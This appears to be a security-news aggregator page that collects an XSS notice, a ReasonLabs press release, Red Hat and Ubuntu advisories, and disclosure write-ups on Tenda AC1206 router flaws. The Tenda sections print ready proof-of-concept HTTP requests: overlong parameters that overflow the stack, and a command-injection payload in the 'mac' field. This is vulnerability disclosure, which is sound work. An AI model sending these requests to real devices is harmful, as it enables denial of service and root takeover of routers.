MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the currentRequest parameter.

CVE-2022-37238: SecurityGateway for Email Servers Release Notes

Online Security autonomously blocks malicious URLs, extensions, ad trackers, and pop-ups 24/7, protecting consumers from complex and rapidly evolving cyber threats online.

**NEW YORK, Aug. 24, 2022 /PRNewswire/** — ReasonLabs, a leading cybersecurity company providing enterprise-grade protection to users worldwide, has launched its newest product, Online Browser Security. The product provides real-time, 24/7 protection against malicious URLs, phishing, harmful extensions, suspicious downloads, intrusive cookies and trackers, unauthorized notifications, and pop-ups. It is currently available worldwide as a free download.

Online Browser Security is seamlessly integrated with RAV Endpoint Protection, ReasonLabs' leading antivirus software built on a multilayered machine-learning engine, to keep personal data safe from security threats. Bringing all the elements of a next-generation antivirus solution to the web browser, the solution allows consumers to use the internet with confidence and peace of mind.

Powered by an autonomous protection engine, users can choose their own protection settings and let the endpoint protection do the work for them. It comes complete with a dashboard to stay informed regarding any identified and blocked online threats. Scheduled and user-initiated scans are also available at the touch of a button.

"Our mission at ReasonLabs is to provide every home user with the same degree of cybersecurity protection that large companies receive," said Kobi Kalif, ReasonLabs CEO. "In our connected world, everyone deserves the highest level of protection, and today, we have added another solution that will safeguard users in real-time, 24/7. As an additional layer to our security platform, RAV Online Security offers next-generation protection for all next-generation cyber threats."

Key features of RAV Browser Security include a malicious URL blocker, the ability to disable harmful extensions, and the blocking of suspicious cookies and ad trackers. The product also monitors all file downloads and comes equipped with an advanced threat scanner, and has notification control. These features can be easily managed through the easy-to-use RAV Online Security dashboard.

Optimizing users' online experience, Online Security is a key component of ReasonLabs' advanced breach prevention product suite, which also includes RAV EDR, RAV VPN, RAV Safer Web, and FamilyKeeper, its parental control solution.

About ReasonLabs:  
ReasonLabs is a global pioneer in cybersecurity detection and prevention. Powered by machine learning, ReasonLabs' cutting-edge technology is revolutionizing consumer-focused cybersecurity, bringing enterprise-grade protection into the homes of tens of millions of users worldwide. Its innovative engine scans over 2 billion files in 180 countries a day, delivering fast, comprehensive data while providing 24/7 real-time threat detection. Founded in 2016, ReasonLabs is based in New York and Tel Aviv.

**Learn more:** https://www.ReasonLabs.com  
**Follow us:** Blog | Twitter | Facebook | LinkedIn | Instagram | YouTube

  
SOURCE: ReasonLabs

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

ReasonLabs Launches Free Online Security Tool to Power Secure Web Experience for Millions of Global Users

Red Hat Security Advisory 2022-6184-01 - The Self Node Remediation Operator works in conjunction with the Machine Health Check or the Node Health Check Operators to provide automatic remediation of unhealthy nodes by rebooting them. This minimizes downtime for stateful applications and RWO volumes, as well as restoring compute capacity in the event of transient failures.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Self Node Remediation Operator 0.4.1 security update  
Advisory ID:       RHSA-2022:6184-01  
Product:           RHWA  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6184  
Issue date:        2022-08-25  
CVE Names:         CVE-2022-1292 CVE-2022-1586 CVE-2022-1785  
                   CVE-2022-1897 CVE-2022-1927 CVE-2022-2068  
                   CVE-2022-2097 CVE-2022-30631  
====================================================================  
1. Summary:

This is an updated release of the Self Node Remediation Operator. The Self  
Node Remediation Operator replaces the Poison Pill Operator, and is  
delivered by Red Hat Workload Availability.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

The Self Node Remediation Operator works in conjunction with the Machine  
Health Check or the Node Health Check Operators to provide automatic  
remediation of unhealthy nodes by rebooting them. This minimizes downtime  
for stateful applications and RWO volumes, as well as restoring compute  
capacity in the event of transient failures.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, see the CVE page(s)  
listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, see:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. References:

https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwdmJdzjgjWX9erEAQhbTQ//Tplmgrd41CYr3MR1vSfhYdQqJ34XomuL  
GVZ77BNRxA7zb3JbCM11UhxmnZGFfSHvza7hWXsJuHLlRxp+niURrxzHcERDTolY  
Glh8K0KNa4cPAbvBkL293UJz3yfwbuy1XUn55tQ2s4BSKyLmDlekxT/8P96gUbl4  
JEw5B1gV/XHYk0njC5PgGjmwwe6JT05efvBFaiSLDkHhahpBjamUaDMov7IElIu7  
khA8XF/Ty2KXrWDNdothqw1TCHRc41pQLo3MPpeGyA6QTFvw+6nNvYtr5bi6PspO  
raElAq1kszYiLXF1/FHrE5ZVWRJrwAPIlt+ZtYS6JCQmvHJPEEGGBuuzPYsraR25  
+NI8r8z5aiNxYtP4/TtBFZD9SmZE4zr64z5vHZAzv4YUvFl5Fs3ITx88SQ20opXT  
BtgWxz1rsyDrcF2nOH98BrczJVsG7kpnQGw/Zhpril8n1AP/o7YEBE1TPjpG33PA  
RkFfHEfsev0pmuxN69DmBA290XN+khQSBgWKhndACDA5HcjA7hO4/jqxxW+TzfFS  
gplu7pnyXSmTgYQxuHNfREkePpwzDCIPkXVOCQdlSpXF0iFgcCXygs6dq30j+54z  
lWPGcfYNE+0L1tGeUtgTcBgeeMHc/zX3+9BGXZ+rA3oLxV/ySZNQfJqQsH4CUyqr  
2xsqRVjngeU=QoWK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6184-01

Ubuntu Security Notice 5578-2 - USN-5578-1 fixed a vulnerability in Open VM Tools. This update provides the corresponding update for Ubuntu 16.04 ESM. It was discovered that Open VM Tools incorrectly handled certain requests. An attacker inside the guest could possibly use this issue to gain root privileges inside the virtual machine.

    =========================================================================Ubuntu Security Notice USN-5578-2August 24, 2022open-vm-tools vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:open-vm-tools could be made to run programs as an administrator.Software Description:- open-vm-tools: Open VMware Tools for virtual machines hosted on VMwareDetails:USN-5578-1 fixed a vulnerability in Open VM Tools. This update providesthe corresponding update for Ubuntu 16.04 ESM.Original advisory details: It was discovered that Open VM Tools incorrectly handled certain requests. An attacker inside the guest could possibly use this issue to gain root privileges inside the virtual machine.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:  open-vm-tools                   2:10.2.0-3~ubuntu0.16.04.1+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5578-2  https://ubuntu.com/security/notices/USN-5578-1  CVE-2022-31676

Ubuntu Security Notice USN-5578-2

Red Hat Security Advisory 2022-6180-01 - The rsync utility enables the users to copy and synchronize files locally or across a network. Synchronization with rsync is fast because rsync only sends the differences in files over the network instead of sending whole files. The rsync utility is also used as a mirroring tool.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: rsync security update  
Advisory ID:       RHSA-2022:6180-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6180  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-29154  
====================================================================  
1. Summary:

An update for rsync is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The rsync utility enables the users to copy and synchronize files locally  
or across a network. Synchronization with rsync is fast because rsync only  
sends the differences in files over the network instead of sending whole  
files. The rsync utility is also used as a mirroring tool.

Security Fix(es):

* rsync: remote arbitrary files write inside the directories of connecting  
peers (CVE-2022-29154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2110928 - CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
rsync-3.1.3-14.el8_6.3.src.rpm

aarch64:  
rsync-3.1.3-14.el8_6.3.aarch64.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.aarch64.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.aarch64.rpm

noarch:  
rsync-daemon-3.1.3-14.el8_6.3.noarch.rpm

ppc64le:  
rsync-3.1.3-14.el8_6.3.ppc64le.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.ppc64le.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.ppc64le.rpm

s390x:  
rsync-3.1.3-14.el8_6.3.s390x.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.s390x.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.s390x.rpm

x86_64:  
rsync-3.1.3-14.el8_6.3.x86_64.rpm  
rsync-debuginfo-3.1.3-14.el8_6.3.x86_64.rpm  
rsync-debugsource-3.1.3-14.el8_6.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9ZtzjgjWX9erEAQgmvQ/9FmzM7Jmz920bmACXLim9ggjCj2OqLSH5  
WC5//7e33xjwaslv3v9qNatPmTnW/UBNgrm3ddU+mT8YqAeStm6GO9PjpswHTNvX  
ROlVLsOqWHSyiHaPuBE6pfug7+dM0BlDtGRzkympqeeIN6Bqjs2tLkQ05qWngvj3  
g/6rNNL/N72+qfNYlLetfhDQtel1qAbu1RokYuMC9p3zRPdrvOMEuDE5bWxpZF0J  
hl/1B994ZbqVqg/Azgt5BjanRcg6w/fp7Vc0FwwQKnS12c++oe95PokM+/wIycfs  
naljKis0qHVhsTnTB699ci2cQ2u/yiIA91GB9bXpRlFiI2FTQz9M7tr909TRHDnx  
F/xHYFaoyQWqDuy/yA2zX7+sB5Jyh9IBWh3/44aKOxuzekfFTvThbcPtlMrSup/w  
wI6X55kB6s1BuJ8sToRiJAOotHqmlReayMEq7Yf2ppaC+oyQ6tK22uKltCOc80qO  
kgwIJMDF4M/AEOu7fiDQyV0yK87ZheFs4ZCtYU7Jp8fwBESrGEbiX0feD8I4HWSO  
iEC6BGtFoXNHQ/4hvxf8RFEm/FWLsnKSSbilgLns8UMveMwq+sob2Pqfru2VqwN6  
AoEimi24ZjyBzYIkTHb4GWGM7ON6kPSxAzP6H82ONeZyQeVjnj4rX3Px7Ja5Bxzr  
OSJSjw9dIpU=PuHU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6180-01

Tenda AC1206 V15.03.06.23 was discovered to contain multiple stack overflows via the deviceMac and the device_id parameters in the function addWifiMacFilter.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the addWifiMacFilter function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the addWifiMacFilter function,the device_mac we entered (the value of deviceMac) and the device_id we entered (the value of deviceId) are formatted with the sprintf function, spliced with %s;%d;%s strings, and saved to mib_value. It is not secure, as long as the size of the data we enter is larger than the size of mib_value, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    deviceMac=a&deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37814: vuln/Tenda/AC1206/14 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the function fromSetSysTime.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromSetSysTime function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromSetSysTime function,tmpstr(the value of time) we entered is formatted using the sscanf function and in the form of %[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of year、month、day、hour、min or sec, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 12
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    timeType=manual&time=1-1-1 1:1:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37813: vuln/Tenda/AC1206/16 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a command injection vulnerability via the mac parameter in the function formWriteFacMac.

**Tenda AC1206 (V15.03.06.23) has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to contain a command insertion vulnerability in formWriteFacMac.This vulnerability allows an attacker to execute arbitrary commands through the "mac" parameter.

The mac(the value of mac) we entered will be passed into the doSystemCmd function as a parameter.

The doSystemCmd function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /goform/WriteFacMac?mac=;echo%20you%20pwn%20it 
    Host: 192.168.37.137
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Cookie: password=caw5gk
    Upgrade-Insecure-Requests: 1
    

The above diagram shows that the command has been executed successfully.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37810: vuln/Tenda/AC1206/19 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the speed_dir parameter in the function formSetSpeedWan.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetSpeedWan function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formSetSpeedWan function,the speed_dir we entered (the value of speed_dir) is formatted with the sprintf function, spliced with %s strings, and saved to ret_buf. It is not secure, as long as the size of the data we enter is larger than the size of ret_buf, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetSpeedWan HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    speed_dir=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37809: vuln/Tenda/AC1206/11 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the index parameter in the function formWifiWpsOOB.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formWifiWpsOOB function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formWifiWpsOOB function,the index we entered (the value of index) is formatted with the sprintf function, spliced with %s;%s strings, and saved to tmp. It is not secure, as long as the size of the data we enter is larger than the size of tmp, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiWpsOOB HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

Tag

#mac